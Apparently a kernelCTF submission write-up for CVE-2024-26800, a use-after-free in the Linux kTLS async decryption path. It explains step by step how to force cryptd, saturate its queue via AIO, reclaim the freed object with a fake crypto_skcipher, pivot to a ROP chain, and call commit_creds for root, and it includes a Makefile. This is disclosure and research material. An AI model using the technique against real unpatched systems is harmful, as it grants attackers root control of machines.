# pocs/linux/kernelctf/CVE-2024-26800_cos/docs/exploit.md
## Setup

### TLS setup
To trigger TLS encryption we must first attach the kTLS ULP to a connected TCP socket and configure the crypto parameters.
This is done using setsockopt() with the SOL_TLS level:

```
/* The socket must first be attached to the kTLS ULP. */
if (setsockopt(sock, SOL_TCP, TCP_ULP, "tls", sizeof("tls")) < 0)
    err(1, "TCP_ULP");

static struct tls12_crypto_info_aes_ccm_128 crypto_info;
crypto_info.info.version = TLS_1_2_VERSION;
crypto_info.info.cipher_type = TLS_CIPHER_AES_CCM_128;

if (setsockopt(sock, SOL_TLS, TLS_TX, &crypto_info, sizeof(crypto_info)) < 0)
    err(1, "TLS_TX");
```

This syscall triggers allocation of TLS context objects which will be important later on during the exploitation phase.

In the kernelCTF config, PCRYPT (the parallel crypto engine) is disabled, so our only option for triggering async crypto is CRYPTD (the software async crypto daemon).

Each crypto operation needed for TLS is usually implemented by multiple drivers.
For example, AES encryption in CBC mode is available through aesni_intel, aes_generic or cryptd (which is a daemon that runs these basic synchronous crypto operations in parallel using an internal queue).

Available drivers can be examined by looking at /proc/crypto, however those are only the drivers of the currently loaded modules. Crypto API supports loading additional modules on demand.
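For example, the currently registered implementations and their priorities can be summarized like this (a one-liner sketch; exact output depends on which modules are loaded):

```shell
# Summarize registered crypto implementations as "priority driver (algorithm)".
# The Crypto API picks the highest-priority driver for each algorithm.
awk '/^name/ {n=$3} /^driver/ {d=$3} /^priority/ {print $3, d, "(" n ")"}' \
    /proc/crypto | sort -rn | head
```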

As seen in the code snippet above, we have no direct control over which crypto drivers will be used for our TLS encryption.
Drivers are selected automatically by the Crypto API based on the priority field, which is computed internally to pick the "best" driver.

By default, cryptd is not selected and is not even loaded, which gives us no chance to exploit vulnerabilities in async operations.

However, we can cause cryptd to be loaded and influence the selection of drivers for TLS operations by using the Crypto User API. This API is used to perform low-level cryptographic operations and allows the user to select an arbitrary driver.

The interesting thing is that requesting a given driver permanently changes the system-wide list of available drivers and their priorities, affecting future TLS operations.

The following code causes the AES CCM encryption selected for TLS to be handled by cryptd:

```
struct sockaddr_alg sa = {
    .salg_family = AF_ALG,
    .salg_type = "skcipher",
    .salg_name = "cryptd(ctr(aes-generic))"
};
int c1 = socket(AF_ALG, SOCK_SEQPACKET, 0);

if (bind(c1, (struct sockaddr *)&sa, sizeof(sa)) < 0)
    err(1, "af_alg bind");

struct sockaddr_alg sa2 = {
    .salg_family = AF_ALG,
    .salg_type = "aead",
    .salg_name = "ccm_base(cryptd(ctr(aes-generic)),cbcmac(aes-aesni))"
};

if (bind(c1, (struct sockaddr *)&sa2, sizeof(sa2)) < 0)
    err(1, "af_alg bind");
```

### User API crypto setup

We'll also use the crypto user API to execute symmetric-key cipher operations handled by cryptd.
The user API has a more complex setup sequence than TLS.

We need to:
1. Create an AF_ALG socket.
2. Bind a sockaddr_alg structure to select the crypto type (skcipher, aead, hash, etc.) and the algorithm.
3. Call setsockopt() with ALG_SET_KEY to set the key.
4. Call accept() on the socket to get the fd that will be used for the actual crypto operations.
5. Call sendmsg() with a prepared message containing the data to be encrypted/decrypted, plus a control message selecting the direction (encrypt/decrypt) and the IV for the operation.
6. Finally, call recvmsg() to trigger the actual crypto operation and read back the results.

## Reaching the queue limit of cryptd

The default queue limit (cryptd.cryptd_max_cpu_qlen) is 1000.
The naive way to reach it would be to make a lot of TLS or crypto API requests with sendmsg()/recvmsg(), but this approach quickly turns out to be useless: on each return from the kernel, cryptd gets scheduled and processes one of our requests, so the queue size stays roughly constant.

We need a way to submit crypto requests without leaving the kernel. This could be done with io_uring, but io_uring is disabled on the kernelCTF LTS instances.
Instead we use a lesser-known async subsystem of the kernel called AIO.
It is much simpler than io_uring and only supports read/write/poll/fsync operations, but that is enough for our purposes.

Using AIO is very simple: we define the operations to be performed in a list of iocb structures and pass it to io_submit().

To reach the queue limit we prepare over 1000 user crypto API encryption requests.
User API requests do not set the CRYPTO_TFM_REQ_MAY_BACKLOG flag, so requests over the limit are simply rejected instead of going into backlog mode.
This way we don't have to worry about triggering the vulnerability prematurely.

## Triggering the use-after-free

When the cryptd queue is at maximum capacity, we just have to call recvmsg() on our TLS socket; this puts our request on cryptd's backlog.
crypto_aead_decrypt() will return EBUSY and tls_do_decryption() will wait for the completion of the decryption work.
If the data sent over the TLS socket is not a valid ciphertext, tls_do_decryption() returns EBADMSG, and by that time tls_decrypt_done() has already freed the AEAD request allocated in tls_decrypt_sg().

tls_decrypt_sg() then calls kfree() on the AEAD request, which trips the kernel's double-free detection unless another allocation from the same cache happens between the kfree() in tls_decrypt_done() and this second free.

## Allocating our payload in place of the AEAD request

crypto_aead_decrypt() queues decryption in cryptd and returns to tls_do_decryption() which calls tls_decrypt_async_wait() to wait for the completion of the decryption work.
cryptd uses per-CPU workers and each worker is a separate kernel thread. Work is done on the same CPU that was used to queue the request.
When decryption is finished cryptd worker calls tls_decrypt_complete() which calls complete() waking up the thread waiting in tls_decrypt_async_wait().
However, complete() only wakes the waiting process; the scheduler decides which process to switch to after cryptd finishes its work.

To get a chance to run our userspace code right after tls_decrypt_complete(), we reduce the priority of the main process that called
io_submit() by calling nice(19), after cloning a separate child process that will make the allocation.

The child process uses io_getevents() to synchronize with the AIO state and uses a user key payload primitive to allocate from kmalloc-1k (the cache that was used to allocate the AEAD request in tls_decrypt_sg()).

When tls_decrypt_sg() runs after tls_decrypt_async_wait() it will free our recently allocated key payload, creating a use-after-free on our object.


## Allocating a better victim object for RIP control

A user key payload doesn't give us direct RIP control, so we need a different victim object allocated from kmalloc-1k.
We used a crypto_skcipher object, which contains a crypto_tfm holding a pointer to a skcipher_alg object full of useful function pointers.
A crypto_skcipher is allocated when bind() is called on a crypto user API socket with the skcipher crypto type selected.

After binding the socket, we remove the user key payload (freeing the crypto_skcipher) and allocate from kmalloc-1k again to overwrite crypto_skcipher with our fake object.
The netlink skb allocation primitive is chosen here because it lets us control the buffer from its very beginning.

The only field in crypto_skcipher required for exploitation is the struct skcipher_alg pointer - we need a place to craft this object at a known kernel address. For this we used the cpu_entry_area technique.

```
struct skcipher_alg {
int (*setkey)(struct crypto_skcipher *, const u8 *, unsigned int); /* 0 0x8 */
int (*encrypt)(struct skcipher_request *); /* 0x8 0x8 */
int (*decrypt)(struct skcipher_request *); /* 0x10 0x8 */
int (*init)(struct crypto_skcipher *); /* 0x18 0x8 */
void (*exit)(struct crypto_skcipher *); /* 0x20 0x8 */
unsigned int min_keysize; /* 0x28 0x4 */
unsigned int max_keysize; /* 0x2c 0x4 */
unsigned int ivsize; /* 0x30 0x4 */
unsigned int chunksize; /* 0x34 0x4 */
unsigned int walksize; /* 0x38 0x4 */
struct crypto_alg base __attribute__((__aligned__(8))); /* 0x40 0x180 */
/* size: 448, cachelines: 7, members: 11 */
};
```

We only need to set 3 fields to be able to trigger a function pointer call:
1. .setkey
2. .min_keysize
3. .max_keysize


## Getting RIP control

To trigger a call to .setkey, we call setsockopt() with ALG_SET_KEY on our crypto user API socket; the key length must fall between the fake min_keysize and max_keysize for the call to reach the function pointer.

## Pivot to ROP

The .setkey function is called with a pointer to the crypto_skcipher in RDI.

Three gadgets are needed to pivot to the ROP chain:

```
mov r8, qword ptr [rdi + 0xc8]
mov eax, 1
test r8, r8
je 0xffffffff81ed2b71
mov rsi, rdi
mov rcx, r14
mov rdi, rbp
mov rdx, r15
call __x86_indirect_thunk_r8
```

which copies RDI to RSI

```
push rsi
jmp qword ptr [rsi + 0x66]
```

and
```
pop rsp
```

## Second pivot

At this point we have full ROP, but our space is limited.
To have enough space to execute all privilege escalation code we have to pivot again.
This is quite simple - we choose an unused read/write area in the kernel and use copy_user_generic_string() to copy the second stage ROP from userspace to that area.
Then we use a `pop rsp ; ret` gadget to pivot there.

## Privilege escalation

The second stage of the ROP chain performs the standard commit_creds(&init_cred); switch_task_namespaces(pid, &init_nsproxy); sequence and returns to userspace.
# pocs/linux/kernelctf/CVE-2024-26800_cos/docs/vulnerability.md
## Requirements to trigger the vulnerability

- Kernel configuration: CONFIG_TLS and CONFIG_CRYPTO_CRYPTD
- User namespaces required: no

## Commit which introduced the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8590541473188741055d27b955db0777569438e3

## Commit which fixed the vulnerability

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=13114dc5543069f7b97991e3b79937b6da05f5b0

## Affected kernel versions

Introduced in 6.6.18 and cos-109-17800-147-54. Fixed in 6.6.20 and cos-109-17800-218-20.

## Affected component, subsystem

net/tls

## Description

When TLS submits a decryption request in async mode to the crypto API, the request is handled by cryptd. When the number of queued requests exceeds the maximum queue size (cryptd.cryptd_max_cpu_qlen), the API enters "backlog mode" and crypto_aead_decrypt() returns EBUSY in tls_do_decryption():

```
static int tls_do_decryption(struct sock *sk,
struct scatterlist *sgin,
struct scatterlist *sgout,
char *iv_recv,
size_t data_len,
struct aead_request *aead_req,
struct tls_decrypt_arg *darg)
{
...

ret = crypto_aead_decrypt(aead_req);

if (ret == -EBUSY) {
ret = tls_decrypt_async_wait(ctx);
ret = ret ?: -EINPROGRESS;
}
if (ret == -EINPROGRESS) {
if (darg->async)
return 0;

ret = crypto_wait_req(ret, &ctx->async_wait);
}
darg->async = false;

return ret;
}
```


tls_do_decryption() will then wait for the completion of the decryption work, and if there was an error (e.g. an invalid ciphertext causing EBADMSG), this error is returned to the caller:

```
static int tls_decrypt_sg(struct sock *sk, struct iov_iter *out_iov,
struct scatterlist *out_sg,
struct tls_decrypt_arg *darg)
{
...
err = tls_do_decryption(sk, sgin, sgout, dctx->iv,
data_len + prot->tail_size, aead_req, darg);
if (err)
goto exit_free_pages;

...

exit_free_pages:
/* Release the pages in case iov was mapped to pages */
for (; pages > 0; pages--)
put_page(sg_page(&sgout[pages]));
exit_free:
kfree(mem);
exit_free_skb:
consume_skb(clear_skb);
return err;
}

```

The error returned from tls_do_decryption() causes tls_decrypt_sg() to free the sgout pages and the AEAD request object (mem), just as it would to handle an error in non-async mode.
The problem is that in async mode tls_decrypt_done() has already freed these items, resulting in a use-after-free/double-free vulnerability.
# Makefile

```
INCLUDES =
LIBS = -pthread -ldl -laio
CFLAGS = -fomit-frame-pointer -static -fcf-protection=none

exploit: exploit.c kernelver_17800.147.60.h kaslr.c
	gcc -o $@ exploit.c kaslr.c $(INCLUDES) $(CFLAGS) $(LIBS)

prerequisites:
	sudo apt-get install libkeyutils-dev libaio-dev
```